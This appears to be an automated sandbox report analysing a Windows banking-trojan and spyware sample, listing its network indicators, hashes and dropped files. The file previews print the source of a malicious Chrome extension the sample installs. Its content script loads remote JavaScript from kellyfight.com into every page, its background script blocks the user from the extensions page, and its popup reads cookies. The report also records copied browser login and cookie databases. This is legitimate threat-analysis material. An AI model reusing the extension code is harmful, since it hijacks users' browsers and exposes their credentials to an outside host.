Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes: 36
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal93.bank.troj.spyw.evad.winEXE@32/37@4/3
EGA Information: Failed
HDC Information:
• Successful, ratio: 60.1% (good quality ratio 57.2%)
• Quality average: 80.5%
• Quality standard deviation: 27.1%
HCA Information:
• Successful, ratio: 68%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 168.61.161.212, 104.43.139.144, 51.11.168.160, 92.122.213.194, 92.122.213.247, 2.20.142.210, 2.20.142.209, 51.103.5.186, 52.155.217.156, 20.54.26.129, 23.210.248.85, 204.79.197.200, 13.107.21.200
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, emea1.wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, www-bing-com.dual-a-0001.a-msedge.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time      Type             Description
17:36:38  API Interceptor  4x Sleep call for process: Cyfj6XGbkd.exe modified
17:36:46  API Interceptor  4x Sleep call for process: 56BB1610C0318054.exe modified

Joe Sandbox View / Context

IPs

Match         Associated Sample Name / URL  Detection  Context
104.21.23.16  FileSetup-v17.04.41.exe       malicious  84CFBA021A5A6662.xyz/info_old/ddd
              FileSetup-v17.04.41.exe       malicious  84CFBA021A5A6662.xyz/info_old/ddd

Domains

Match                 Associated Sample Name / URL  Detection  Context
84CFBA021A5A6662.xyz  N1yprTBBXs.exe                malicious  172.67.208.74
                      FileSetup-v17.04.41.exe       malicious  104.21.23.16
                      FileSetup-v17.04.41.exe       malicious  104.21.23.16
84cfba021a5a6662.xyz  N1yprTBBXs.exe                malicious  172.67.208.74
                      FileSetup-v17.04.41.exe       malicious  104.21.23.16
                      FileSetup-v17.04.41.exe       malicious  104.21.23.16

ASN

Match            Associated Sample Name / URL  Detection  Context
CLOUDFLARENETUS  Royalmail-Shipment.xls        malicious  172.67.1.225
                 N1yprTBBXs.exe                malicious  172.67.208.74
                 Royalmail-Shipment.xls        malicious  172.67.1.225
                 PO#PDT28394209.exe            malicious  172.67.176.199
                 c8TrAKsz0T.exe                malicious  104.21.47.75
                 FileSetup-v17.04.41.exe       malicious  104.21.23.16
                 RddH6rLRfH.exe                malicious  104.21.27.240
                 Immuni.apk                    malicious  172.64.100.5
                 FileSetup-v17.04.41.exe       malicious  104.21.23.16
                 UGPK60taH6.dll                malicious  104.20.184.68
                 4PDNbYK5fj.exe                malicious  172.67.169.213
                 pmTdQ57tvM.exe                malicious  172.67.169.213
                 7BtV39hziI.exe                malicious  104.21.27.240
                 dc4AaqW6Aa.exe                malicious  104.21.27.240
                 lAy87VNPiL.exe                malicious  104.21.27.240
                 97aa4Ywd9y.exe                malicious  104.21.27.240
                 wuRBlQt0Tz.exe                malicious  172.67.169.213
                 4GRuinub4a.exe                malicious  172.67.169.213
                 v8c1m9dW8G.exe                malicious  172.67.169.213
                 XQx9brj85p.exe                malicious  172.67.169.213

JA3 Fingerprints

No context

Dropped Files

Match                                                              Associated Sample Name / URL  Detection
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe            N1yprTBBXs.exe                malicious
                                                                   FileSetup-v17.04.41.exe       malicious
                                                                   FileSetup-v17.04.41.exe       malicious
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe  N1yprTBBXs.exe                malicious
                                                                   FileSetup-v17.04.41.exe       malicious
                                                                   FileSetup-v17.04.41.exe       malicious
C:\Users\user\AppData\Local\Temp\MSIDCDD.tmp                       N1yprTBBXs.exe                malicious
                                                                   FileSetup-v17.04.41.exe       malicious
                                                                   FileSetup-v17.04.41.exe       malicious

Created / dropped Files

C:\Users\user\AppData\Local\Cookies1611970637026
Process: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 20480
Entropy (8bit): 0.6951152985249047
Encrypted: false
SSDEEP: 24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBopIvJn2QOYiUG3PaVrX:T5LLOpEO5J/Kn7U1uBopIvZXC/alX
MD5: EA7F9615D77815B5FFF7C15179C6C560
SHA1: 3D1D0BAC6633344E2B6592464EBB957D0D8DD48F
SHA-256: A5D1ABB57C516F4B3DF3D18950AD1319BA1A63F9A39785F8F0EACE0A482CAB17
SHA-512: 9C818471F69758BD4884FDB9B543211C9E1EE832AC29C2C5A0377C412454E8C745FB3F38FF6E3853AE365D04933C0EC55A46DDA60580D244B308F92C57258C98
Malicious: false

C:\Users\user\AppData\Local\Cookies1611970645636
Process: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 20480
Entropy (8bit): 0.6951152985249047
Encrypted: false
SSDEEP: 24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBopIvJn2QOYiUG3PaVrX:T5LLOpEO5J/Kn7U1uBopIvZXC/alX
MD5: EA7F9615D77815B5FFF7C15179C6C560
SHA1: 3D1D0BAC6633344E2B6592464EBB957D0D8DD48F
SHA-256: A5D1ABB57C516F4B3DF3D18950AD1319BA1A63F9A39785F8F0EACE0A482CAB17
SHA-512: 9C818471F69758BD4884FDB9B543211C9E1EE832AC29C2C5A0377C412454E8C745FB3F38FF6E3853AE365D04933C0EC55A46DDA60580D244B308F92C57258C98
Malicious: false

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\background.js
Process: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type: ASCII text
Category: dropped
Size (bytes): 886
Entropy (8bit): 5.022683940423506
Encrypted: false
SSDEEP: 24:sFfWxmARONJTW0/I8/lZ9OKMmA6eiH4MmDCvTV3u4:sYo/NJ/7Augi8Dy
MD5: FEDACA056D174270824193D664E50A3F
SHA1: 58D0C6E4EC18AB761805AABB8D94F3C4CBE639F5
SHA-256: 8F538ED9E633D5C9EA3E8FB1354F58B3A5233F1506C9D3D01873C78E3EB88B8D
SHA-512: 2F1968EDE11B9510B43B842705E5DDAC4F85A9E2AA6AEE542BEC80600228FF5A5723246F77C526154EB9A00A87A5C7DDD634447A8F7A97D6DA33B94509731DBC
Malicious: false
Preview: $(function() {..chrome.tabs.onSelectionChanged.addListener(function(tab,info){....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;....console.log(pageUrl);....if (Number(pageUrl.indexOf("extensions")) > 1) ....{....chrome.tabs.update({url:'https://chrome.google.com/webstore/category/extension'}); ....}. .... ...});.});....chrome.webRequest.onBeforeRequest.addListener(function(details) {....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;...});........var url = details.url;...}, {...urls : [ "<all_urls>" ]..}, [ "blocking" ]);...function sendMessageToContentScript(message, callback) {...chrome.tabs.query({....active : true,....currentWindow : true...}, function(tabs) {....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {.....if (callback)......callback(response);....});...});..}...});

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\book.js
Process: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 152
Entropy (8bit): 5.039480985438208
Encrypted: false
SSDEEP: 3:2LGffWpnYOJRyRmgO9lNCaVpveLWCfKVsSdDXaDQTNUHWSpHovJiRzlLBche:2LGXWpn7J8mgO9l3BeiCfLSdDYGNeW7u
MD5: 30CBBF4DF66B87924C75750240618648
SHA1: 64AF3DD53D6DED500863387E407F876C89A29B9A
SHA-256: D35FBD13C27F0A01DC944584D05776BA7E6AD3B3D2CBDE1F7C349E94502127F5
SHA-512: 8117B8537A0B5F4BB3ED711D9F062E7A901A90FD3D2CF9DFFCC15D03ED4E001991BA2C79BCA072FA7FD7CE100F38370105D3CE76EB87F2877C0BF18B4D8CFBAB
Malicious: false
Preview: (function(){.. var s = document.createElement('script'); .. s.src = '//kellyfight.com/22aff56f45f6b36dec.js'; .. document.body.appendChild(s);..})();

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\icon.png
Process: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type: PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 1161
Entropy (8bit): 7.79271055262892
Encrypted: false
SSDEEP: 24:2mEKEvFZonmDzTaC6EU1yPj0bhJKaurzF3LvLIeR2D+JGP6A8UJ0wrBI4ez:DExZomDXe1yPYHKNx3LvLvWFP6noFy4M
MD5: 5D207F5A21E55E47FCCD8EF947A023AE
SHA1: 3A80A7CF3A8C8F9BDCE89A04239A7E296A94160F
SHA-256: 4E8CE139D89A497ADB4C6F7D2FFC96B583DA1882578AB09D121A459C5AD8335F
SHA-512: 38436956D5414A2CF66085F290EF15681DBF449B453431F937A09BFE21577252565D0C9FA0ACEAAD158B099383E55B94C721E23132809DF728643504EFFCBE2B
Malicious: false
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\icon48.png
Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):2235
Entropy (8bit):7.880518016071819
Encrypted:false
SSDEEP:48:9V93V/3XpV1P2gnjz8xqNaT5YmiH+0Rn6r2ogpZGYmT2pN6esC+s5szuZNwG:BlFP7jzUTKm26rMCYmneWsCG
MD5:E35B805293CCD4F74377E9959C35427D
SHA1:9755C6F8BAB51BD40BD6A51D73BE2570605635D1
SHA-256:2BF1D9879B36BE03B2F140FAD1932BC6AAAAAC834082C2CD9E98BE6773918CA0
SHA-512:6C7D37378AA1E521E73980C431CE5815DEDB28D5B7003009B91392303D3BEC1EE6F2AAE719B766DA4209B607CD702FAE283E1682D3785EFF85E07D5EE81319C8
Malicious:false
                                                                                                                                                Preview: .PNG........IHDR...0...0.....W.......IDATh..Z]l\G.......4."..8N..XB.....D#.< $. W..}....K...P.Q...........P..-xJT.O.*.!UBNjHl'..2..d.k......;........;s.3.o..........)B....D.D:.TH@...W...YB_...kw{&.{.[v;..ot.Zm..!j..PN.....i\. ...r..iU.O...f...........{...B* ..dh)...l.:|)`...'.......c.`.....,.Q.]f~BD@2s.{'V.d..{`IAFO...I......7..7.)j=...p.S..#..x.Ar@$.LQ......,@....\...M5.\.&e0.J...|....Z....h.]P.E.3T.]..4..$..)..J.._...c..g....L.....T.VR|y....Bd..y.k..x..m[q.7...I.S&..'..Rx~...R...y.n.7n.L.|..OZH.......YR.......9.....r....%H_`..n....Q.Q..a..wy} .EnL..r!W...M.%e.1`..i.El..N0_@..S....+.>=L....f...<....?_^[.....e2...@..d,w.....{.........s.......<.#...u<...tM]%K...}.c.......NLB.'.V)A.x.o..-..Y.0..o....L'zk$.$..Yvi..xP...........k..sB...z....\.L....k..l.47[8.?..../..0s..T..O....|E.@.Q."P.k.YNH;x....$.H<.....T...`........................'&.1...C...7.....z^.Xf..e}`...j.:.g.....>..Z{qcm..D.F.DyLK.@@..w,A.a.@.. ..sk.iZ"..d..+.M.....&N.y
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\jquery-1.8.3.min.js
Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:ASCII text, with very long lines, with CRLF line terminators
Category:dropped
Size (bytes):93637
Entropy (8bit):5.292996107428883
Encrypted:false
SSDEEP:1536:96IzxETpavYSGaW4snuHEk/yosnSFngC/VEEG0vd0KO4emAp2LSEMBoviR+I1z5T:v+vIklosn/BLXjxzMhsSQ
MD5:E1288116312E4728F98923C79B034B67
SHA1:8B6BABFF47B8A9793F37036FD1B1A3AD41D38423
SHA-256:BA6EDA7945AB8D7E57B34CC5A3DD292FA2E4C60A5CED79236ECF1A9E0F0C2D32
SHA-512:BF28A9A446E50639A9592D7651F89511FC4E583E213F20A0DFF3A44E1A7D73CEEFDB6597DB121C7742BDE92410A27D83D92E2E86466858A19803E72A168E5656
Malicious:false
                                                                                                                                                Preview: /*! jQuery v1.8.3 jquery.com | jquery.org/license */..(function(e,t){function _(e){var t=M[e]={};return v.each(e.split(y),function(e,n){t[n]=!0}),t}function H(e,n,r){if(r===t&&e.nodeType===1){var i="data-"+n.replace(P,"-$1").toLowerCase();r=e.getAttribute(i);if(typeof r=="string"){try{r=r==="true"?!0:r==="false"?!1:r==="null"?null:+r+""===r?+r:D.test(r)?v.parseJSON(r):r}catch(s){}v.data(e,n,r)}else r=t}return r}function B(e){var t;for(t in e){if(t==="data"&&v.isEmptyObject(e[t]))continue;if(t!=="toJSON")return!1}return!0}function et(){return!1}function tt(){return!0}function ut(e){return!e||!e.parentNode||e.parentNode.nodeType===11}function at(e,t){do e=e[t];while(e&&e.nodeType!==1);return e}function ft(e,t,n){t=t||0;if(v.isFunction(t))return v.grep(e,function(e,r){var i=!!t.call(e,r,e);return i===n});if(t.nodeType)return v.grep(e,function(e,r){return e===t===n});if(typeof t=="string"){var r=v.grep(e,function(e){return e.nodeType===1});if(it.test(t))return v.filter(t,r,!n);t=v.filter(t
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\manifest.json
Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:ASCII text, with very long lines, with CRLF, LF line terminators
Category:dropped
Size (bytes):2380
Entropy (8bit):5.687293760500434
Encrypted:false
SSDEEP:48:QWRIWSIelc1wm6g838z/oTFi5acPKFe8EIelc1a+E8t8Rc3T:DR4Mwmqi5PWevMa+T
MD5:ADF10776EEC8DC0F6E7E3B4AD59CF504
SHA1:4F11FE569189036B42923EF5A8AFB0985DCECDF5
SHA-256:ED373E2B91FDF477D1CC1F8B709C03F03A3963ACA99F51071D5F24407095D22D
SHA-512:7328245AA1473B217BFD33B65A07D0BD1DA96C8A85D5A6DD43E71072211D7BE86AF00BBF1C724747EEADAF36A8A713CE440557B46CB0F2E2CDD35B05C3793CD5
Malicious:false
                                                                                                                                                Preview: {.. "background": {.. "persistent": true,.. "scripts": [ "jquery-1.8.3.min.js", "background.js" ].. },.. "browser_action": {.. "default_icon": "icon.png",.. "default_popup": "popup.html",.. "default_title": "book_helper".. },.. "content_scripts": [ {.. "all_frames": false,.. "js": [ "book.js" ],.. "matches": [ "http://*/*", "https://*/*" ],.. "run_at": "document_idle".. } ],.. "description": "book_helper",.. "icons": {.. "16": "icon.png",.. "48": "icon48.png".. },.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1tm+QFuyEAjdg8bsB1Amy5MksnoFTx+/SDDbN1zp5WgXOZWc9GtAlPwVldE3Bgkz4u8Nnwddy0MunE1cB3zfqw9BHJI2pIaoQH+nQDXCtH2tfOsX9a9JWrQYSgvH5SDsycSaMBd0jaBbC80g6zZEFPE1OR2tcyLkNMJ+p8WzCH2RXQabcwxhCzksydkJhB4scqZjKse1ZJxF724Quu4EsY5CVuoTeremfMAkke23IzB28kf8LkPBCqMR1p/kuib+izmHqQ2132TwRXIk5OkVE+D8KSvh9vl/SwRmtSqepONWXmf/LKXVv2pbqnnb8+OXP6v02MjQ9ioEaX5CK0AgBQIDAQAB",.. "manifest_version": 2,.. "name": "book_helper
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\popup.html
Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:HTML document, ASCII text
Category:dropped
Size (bytes):280
Entropy (8bit):5.048307538221611
Encrypted:false
SSDEEP:6:WLzLyYGRpy6jHz5K3S3ZLeStvrXAqJmW/9mGNVkAnAqJmW/KrV4Nhdbb:97H1x3Zbtv0qJmW8GNVkAAqJmWyrV4Nj
MD5:E93B02D6CFFCCA037F3EA55DC70EE969
SHA1:DB09ED8EB9DBC82119FA1F76B3E36F2722ED2153
SHA-256:B057584F5E81B48291E696C061F94B1E88CA52522490816D4BF900817FF822BD
SHA-512:F85B5B38ADE3EFA605E1DA27E8680045548E3343804073F9FE0C83E4BECFB2EB4A237C8E1C84D43DA386CBDDDCC45F915BCE950ED41D53A8DFDF85AF2DFAC879
Malicious:false
                                                                                                                                                Preview: <!DOCTYPE HTML>.<html>.<head>.<meta charset="UTF-8">.<title></title>.<style type="text/css">.div {..font-size: 30px;..color: red;.}.</style>.<script type="text/javascript" src="jquery-1.8.3.min.js"></script>.<script type="text/javascript" src="popup.js"></script>.</head>..</html>
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\popup.js
Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):642
Entropy (8bit):4.985939227199713
Encrypted:false
SSDEEP:12:wIoAnOh/B9mZ2ysUEjesrdRGOyHM2ssgrIpX3KKjWnoFF2O:gMW9O2yVEjzrwHM7rSKVnoeO
MD5:2AC02EE5F808BC4DEB832FB8E7F6F352
SHA1:05375EF86FF516D91FB9746C0CBC46D2318BEB86
SHA-256:DDC877C153B3A9CD5EC72FEF6314739D58AE885E5EFF09AADBB86B41C3D814E6
SHA-512:6B86F979E43A35D24BAAF5762FC0D183584B62779E4B500EB0C5F73FAE36B054A66C5B0620EA34C6AC3C562624BEC3DB3698520AF570BB4ED026D907E03182E7
Malicious:false
                                                                                                                                                Preview: $(function() {........var a, e;.....chrome.tabs.getSelected(null, function(tab) {....e = tab.url; ....alert("url--" + e);...});.....chrome.cookies.getAll({....url : e...}, function(ytCookies) {....for ( var i = 0; i < ytCookies.length; i++) {.....if (ytCookies[i].name == "abc") {......$("#abc").val(ytCookies[i].value);.....}....}...});................function sendMessageToContentScript(message, callback) {....chrome.tabs.query({.....active : true,.....currentWindow : true....}, function(tabs) {.....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {......if (callback).......callback(response);.....});....});...}....});..
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:ASCII text, with very long lines
Category:dropped
Size (bytes):5453
Entropy (8bit):5.1778438140266125
Encrypted:false
SSDEEP:96:nHXbTqqz/X7jgFO4IV+H/k0JCKL8rbobOEQVuwv:nHXbTJz/rMFoon4KsX
MD5:CEA23A1FFBF8271C9A4543A57C4D9684
SHA1:48D0514B8C6917B57BD092731B2C51679E31B005
SHA-256:A1D30920EB823D01DD3BD0FEFD3004C3F70732ECBD73A7C8D443C76473B65E7E
SHA-512:5692C7BB8667B1E6090169DE636E4673752D9312B8A9ED09D66A34A54954B12725F18047F37DFFFD850BF24B3EA56746C6D5E64D4250B9B2D1EDFA9575638FCE
Malicious:true
                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13245952892183974","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245952891998324","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245952963463509","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":false,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1501624"],"daily_received_length":["0","0","0","0","0","0","0",
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:UTF-8 Unicode text, with very long lines
Category:dropped
Size (bytes):34636
Entropy (8bit):5.5394367000232565
Encrypted:false
SSDEEP:768:AEpwDvUckPWfr+odLl0b1kXqKf/pUZNCgVLH2HfVrUkGRnJziWC:EDhLwjRnNiv
MD5:0DB0D353C97F12B5A1D82ADCC9F25B9D
SHA1:3D4D71E91E74D8120FE44C170A643FAADA389487
SHA-256:0C1B24F1524174D45410539B2CA583C1637EFECD91AE0C52A4EBFD91B00B2A24
SHA-512:3AB9D9842608401D55EDADB77B4C1EB754E2121D02F9E8561D4FEE2FE776C678CED51AC6702BA1499DD49FBF8861D438D128378F3E2490BEC37A95A66F415549
Malicious:true
                                                                                                                                                Preview: {"extensions":{"policy":{"switch":false},"settings":{"aapocclcgogkmnckokdopfmhonfmgoek":{"ack_external":true,"active_permissions":{"api":[],"manifest_permissions":[]},"app_launcher_ordinal":"w","commands":{},"content_settings":[],"creation_flags":137,"events":[],"from_bookmark":false,"from_webstore":true,"granted_permissions":{"api":[],"manifest_permissions":[]},"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13245952896894319","lastpingday":"13245947457776957","location":1,"manifest":{"api_console_project_id":"889782162350","app":{"launch":{"local_path":"main.html"}},"container":"GOOGLE_DRIVE","current_locale":"en","default_locale":"en_US","description":"Create and edit presentations ","icons":{"128":"icon_128.png","16":"icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDLOGW2Hoztw8m2z6SmCjm7y4Oe2o6aRqO+niYKCXhZab572by7acqFIFF0On3e3a967SwNijsTx2n+7Mt3KqWzEKtnwUZqzHYSsdZZK64vWIHIduawP0EICWRMf2RGIBEdDC6I1zErtcDiSrJWeRlnb0DHWXDXlt1YseM7RiON9wIDAQAB","m
C:\Users\user\AppData\Local\Login Data1611970607033
Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):40960
Entropy (8bit):0.792852251086831
Encrypted:false
SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:false
                                                                                                                                                Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Login Data1611970645542
Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):40960
Entropy (8bit):0.792852251086831
Encrypted:false
SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:false
                                                                                                                                                Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\1611970606876
Process: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type: 7-zip archive data, version 0.3
Category: dropped
Size (bytes): 37737
Entropy (8bit): 7.994967159065528
Encrypted: true
SSDEEP: 768:jKbwEEFezqMkJOjWrLgmfA3nT2q5XTcM5QxQ5peEjw4MEe:WbwBFOEPghX5XT/QnkbMEe
MD5: 5A6469A3F787ABD2AE93B47470528F79
SHA1: 4032B59237CC883FB752D9727971B435F4D27EB8
SHA-256: 1B27A55132F5E68D341F617A8EB21C6ED62AAE9017FF01EB8651E05D0615D971
SHA-512: 335985B4FDCDEFED60F6073CC58F44B1E31FA43C1EE253772C5EEB94FD1D93CCF2D4D7C994EF0151FFE32A58369FCA5A605329E77D3A8B038D5142F4946D2105
Malicious: false
C:\Users\user\AppData\Local\Temp\1611970639276
Process: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type: 7-zip archive data, version 0.3
Category: dropped
Size (bytes): 553040
Entropy (8bit): 7.999671101282436
Encrypted: true
SSDEEP: 12288:DSX3/iYsJg9CZjucCzkbXAH+rCd/Q0SeFiDS+wj5KMzCH/RuuHDrDNb:DSX3/iVgrzkbXa+raQ0JUuJj5jzYNrDp
MD5: A4427F2F46DEEA15CEA87BDBB53A22CC
SHA1: 158501079514868D85246E970314A024FF263199
SHA-256: 18BA0794E5C95B5192105CCD9AA09A7DFFF50262971D23E316CA3788627CCA4F
SHA-512: 334255DCA0F71B7B50A147397ECF21B1CB5150FD489AE7EBEFDFD459190865FFAF3CD7783D50B53DFF91CE5628CABB147172A627A400112B490BE17164074C85
Malicious: false
C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
Process: C:\Users\user\Desktop\Cyfj6XGbkd.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 4247224
Entropy (8bit): 7.867812997543559
Encrypted: false
SSDEEP: 49152:roT9J9uexVOSTjyxyFHYRSfSlDR4ZmCc+92ngXBZfiustXoca4P/8uXojZ0Oylih:roT9mexHpullCHlxATtZpJ+8yBVj
MD5: 63204EB716C856723A010747D58A6B00
SHA1: 7E97F00B4C3580CEDEE02C448AC9AEB54AFEFBD2
SHA-256: 6D2DB66A98EC5730BDCBC41DC7C78210FE24FE48BF7E44B59AB01C2084900456
SHA-512: 4B00DC3D824D3526972F74B913CFF2B1D0E12745DE58BFE4BA6196088A17B2346B4EC019BDF923ACC57C77F88AA7B17FA230100C6C35B6672C7A39BFA4953C2E
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 24%
• Antivirus: ReversingLabs, Detection: 59%
C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe:Zone.Identifier
Process: C:\Users\user\Desktop\Cyfj6XGbkd.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Preview: [ZoneTransfer]....ZoneId=0
C:\Users\user\AppData\Local\Temp\MSIDCDD.tmp
Process: C:\Windows\SysWOW64\msiexec.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 6656
Entropy (8bit): 5.2861874904617645
Encrypted: false
SSDEEP: 96:YtJL/UST0S599F4dHVMUqROmhpatBWXxJZr7dJVYJNs6Ol10dLNK:Q2SwSX9wSVUDWXQsxO
